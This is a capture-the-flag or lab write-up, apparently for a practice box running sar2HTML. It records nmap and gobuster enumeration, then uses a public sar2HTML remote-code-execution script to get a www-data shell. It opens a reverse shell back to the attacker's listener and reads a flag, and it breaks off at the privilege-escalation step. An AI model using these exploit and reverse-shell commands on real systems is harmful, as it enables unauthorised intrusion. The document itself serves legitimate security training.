Pwned Date - 30th June 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
|   256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_  256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.35 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/phpinfo.php          (Status: 200) [Size: 95419]
/robots.txt           (Status: 200) [Size: 9]    
/server-status        (Status: 403) [Size: 279]

Going to /robots.txt we get this

Untitled

Going to /sar2HTML we have this webpage

Untitled

Exploitation

Went to Google sar2HTML and I found many exploits, found this github quite simple to use

https://github.com/AssassinUKG/sar2HTML

┌──(kali㉿VirtualBox)-[~/Desktop/sar2HTML]
└─$ py sar2HTMLshell.py -ip 192.168.125.35 
                                                 
Host NOT Vulnerable, Try a new path!!

Seems doesn’t work, try another path

┌──(kali㉿VirtualBox)-[~/Desktop/sar2HTML]
└─$ py sar2HTMLshell.py -ip 192.168.125.35 -pe sar2HTML

The Host Appears Vulnerable, Running a basic shell ...
Enter: 'rs session' for a ReverseShell

$\\cmd> whoami
------- Results -------
www-data

$\\cmd> rs session
No Reverse IP or PORT supplied. Eg: -rip 10.10.10.10:9999
Restart and Try again!!

Running the following with rs session will pop me another terminal window

┌──(kali㉿VirtualBox)-[~/Desktop/sar2HTML]
└─$ py sar2HTMLshell.py -ip 192.168.125.35 -pe sar2HTML -rip 192.168.49.125:9999

The Host Appears Vulnerable, Running a basic shell ...
Enter: 'rs session' for a ReverseShell
$\\cmd> rs session

Now I am in the victim server with user www-data

connect to [192.168.49.125] from (UNKNOWN) [192.168.125.35] 48596
/bin/sh: 0: can't access tty; job control turned off

$ whoami
www-data

$ cd /home
$ ls
local.txt  love

$ cat local.txt
fa8ddca349c499f8d1800aa016e0627e

Privilege Escalation

Upgrade our shell, by running this on the pop up terminal and having our netcat listening